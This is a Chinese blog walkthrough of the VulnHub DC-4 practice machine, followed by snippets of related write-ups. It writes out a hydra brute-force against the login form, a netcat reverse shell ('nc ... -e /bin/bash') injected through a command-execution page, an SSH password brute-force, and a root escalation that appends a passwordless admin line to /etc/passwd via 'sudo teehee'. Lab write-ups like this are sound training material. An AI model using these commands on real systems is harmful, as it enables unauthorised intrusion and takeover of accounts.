DC4靶机

最新推荐文章于 2024-07-23 16:25:29 发布
最新推荐文章于 2024-07-23 16:25:29 发布
阅读量455 收藏
点赞数
分类专栏: 靶机 文章标签: linux ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/117772470
版权

DC4靶机

实验环境

靶机:kali

目标机:DC-4

实验工具:burpsuite

实验步骤

arp-scan -l扫描主机ip地址

nmap扫描开的端口

进行访问80,需要输入密码

hydra -l admin -P /usr/share/wordlists/rockyou.txt x.x.x.161 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F 进行密码爆破

这里注意,如果第一次使用的话可能需要到命令中所存在路径去解压rockyou的压缩包之后即可使用

输入密码打开

看到执行命令,进行burp抓包

看到可控

在burp中输入nc kali的ip地址 -e /bin/bash 进行NC 命令反弹

反弹成功,进入交互式模式

看到home/mail/jim/backups中有密码

复制密码创建jim.txt

进行hydar -l jim -P jim.txt ssh://靶机地址 爆破,并进行ssh远程登录

进入到jim ,进入var

打开查看mbox发现是root用户发来的邮件

有charles用户和密码

登录charles用户

输入echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd 进行提权,成功

 

 

 

xzhome
关注
专栏目录
【vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1993
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1986
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机是vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
DC-4靶机
weixin_50815573的博客
03-08 5672
一、DC-4的信息收集 1.确定IP,端口号; 命令:nmap -sP 192.168.159.0/24 探测到主机的ip为192.168.1.165,下一步进行端口判断; 命令:nmap -A -p- -T4 192.168.1.165 查看源码,我们可以收集到以下信息: 1.页面通过post提交 2.用户名的由username接收 3.密码由password接收 4.表单信息提交到login.php页面进行登陆判断 二、通过暴力破解密码,成功登陆 1.确定密码字典,.
DC-4靶机通关
最新发布
qq_63831588的博客
07-23 1138
teehee提权,bp爆破
渗透测试学习之靶机DC-4
xdbzdgx的博客
11-18 3743
1.下载靶机 本篇文章是DC靶机系列的第四篇,针对的是靶机DC-4,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-4的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-4只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到ro
VulnHub系列 DC-4靶机 渗透详细过程 | 红队打靶
rumil的博客
04-17 1588
通过test.sh脚本的提示信息,再加上查看发现的backups目录当中有密码信息,通过我们得到的三个用户名信息,再加上这个密码信息,可以尝试ssh爆破登录,观察是否可成功爆破出ssh用户的登录密码。回到后台,等登录即可,进入后台,发现有命令工具,进入查看,点击run,发现执行了ls -l命令得回显内容,抓包看一下。然后我们再次通过charles用户进行远程登录,成功登录,发现也有邮件,查看一下,并无有用的信息。去往此目录,查看jim文件得内容信息,发现charles发来的邮件,并有连接密码。
DC4靶机
qq_40646572的博客
04-29 333
靶机信息搜集 发现DC4靶机是192.168.220.208,DC4靶机开启端口是22,80端口。 防止端口信息遗漏,扫描全部端口,nmap默认扫描端口0-1000。 端口扫描完成后,使用nmap脚本漏洞扫描。发现没有可以利用的漏洞。 尝试对靶机进行攻击 打开80端口的http服务,查看目标主机网站是否存在可以打穿到后台的漏洞。 首先进行目录扫描。 未搜集到任何可以利用的信息。。。 下面有两种思路,一种尝试sql注入,另一种,爆破http登录或者ssh爆破。 先尝试sql注入,失败。。。。 下.
vulnhub靶机DC-4 渗透笔记
liver100day的博客
06-09 2173
DC-4 靶机渗透 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:DC-3 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/ 渗透过程 1.信息收集 1.1 主机发现 arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) 确认目标靶机IP地址:192.168.75.148 1.2 端口扫描 确认了IP地址,接下来我们就使用端口扫描神器来扫描目标靶机开放的端口 nmap -T4 -
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
靶机DC-4
weixin_43940853的博客
11-21 444
kali : 192.168.230.226 靶机 :192.168.230.229 开放了web和ssh,还是从web入手 有个登陆页面,这里试了几个弱口令,不能登,看Wp说是爆破一下密码是happy,这里就跳过了(真实情况下哪有这么容易就登陆,主要是积累一下提权方式吧) 发现有可以执行命令的地方,这就想到了反弹一个shell,前面有一个Acid靶机也是这样做的,不过这个靶机是用的netc...
靶机 DC-4
m0_66299232的博客
09-19 355
hydra -L user.txt -P password.txt ssh://192.168.166.133 //-L,-P 都是大写。4.可以看到在/home/jim/backups目录下存在文件old-passwords.bak,可能是密码的备份文件。1.查看存活主机,根据分析得出 192.168.166.133是DC-4靶机IP地址。5.teehee这个root用户不需要密码就能登录,直接拿flag,轻松拿下4.发现了另外一个账户,并且文中有该账户的密码。既然我们获得了旧密码,也获得了账户。命令执行
DC4-靶机
Au
08-25 3559
下载地址 配置的环境: kali:192.168.25.131 DC4 -靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机192.168.25.134,判定为DC3-靶机,继续使用nmap获取详细信息 nmap -A -p 1-65535 192.168.2...
vulnhub之DC4靶机
LainWith的博客
08-15 1119
靶机概览信息收集nmap信息收集爆破后台使用字典爆破登进后台命令注入漏洞敏感信息收集SSH爆破SSH登录提权创建一个管理员以管理员身份登录 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-4,313/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC3的MAC,这样做主机发现时可以通过.
DC-4靶机渗透测试
qq_60463414的博客
07-07 2572
DC4靶机shell反弹,提权流程。
DC-4靶场实战
qq_42754807的博客
03-30 952
DC-4靶场实战
vulnhub靶机之DC-4
m0_52328368的博客
08-19 1183
vulnhub之dc-4详细步骤
DC-4靶机渗透
weixin_45349299的博客
12-21 1094
开放的端口:22 => ssh服务 ---- OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)80 => http服务 ---- nginx 1.15.10扫描出来的网站目录。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值